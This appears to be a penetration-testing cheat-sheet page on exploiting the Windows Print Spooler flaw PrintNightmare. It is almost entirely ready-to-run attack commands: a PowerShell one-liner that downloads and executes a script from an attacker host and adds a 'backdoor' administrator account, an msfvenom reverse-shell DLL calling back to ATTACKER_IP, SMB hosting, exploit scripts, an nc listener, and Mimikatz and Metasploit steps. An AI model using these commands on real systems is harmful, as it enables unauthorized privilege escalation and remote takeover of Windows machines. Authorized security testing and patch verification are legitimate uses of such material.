Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

PrintNightmare exploits the Windows Print Spooler service to achieve LPE (Local Privilege Escalation) or RCE (Remote Code Execution) by loading a malicious DLL as SYSTEM.
CVETypeImpact
CVE-2021-1675LPELocal user → SYSTEM
CVE-2021-34527RCERemote code execution as SYSTEM

Check if Vulnerable

Print Spooler running: 
sc query spooler

Get-Service -Name Spooler
Missing patch: 
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
If no results → vulnerable.

Local Privilege Escalation (LPE)

Using PowerShell (CVE-2021-1675)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
Verifies by adding local admin. Then: 
net localgroup administrators
runas /user:backdoor cmd

GitHub

https://github.com/calebstewart/CVE-2021-1675

Remote Code Execution (RCE)

Step 1 — Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

Step 2 — Host DLL on SMB Share

impacket-smbserver share . -smb2support

Step 3 — Exploit

# cube0x0's exploit
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'

# Using impacket
https://github.com/cube0x0/CVE-2021-1675

Step 4 — Catch Shell

nc -lvnp 4444

Via Mimikatz

misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
Local: 
misc::printnightmare /library:C:\Temp\evil.dll

Metasploit

use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run

Post-Exploitation Cleanup

# Remove added driver
printui.exe /dl /n "PrintIt"
PrintNightmare can crash the Print Spooler service. In a real engagement, coordinate with the client before exploiting.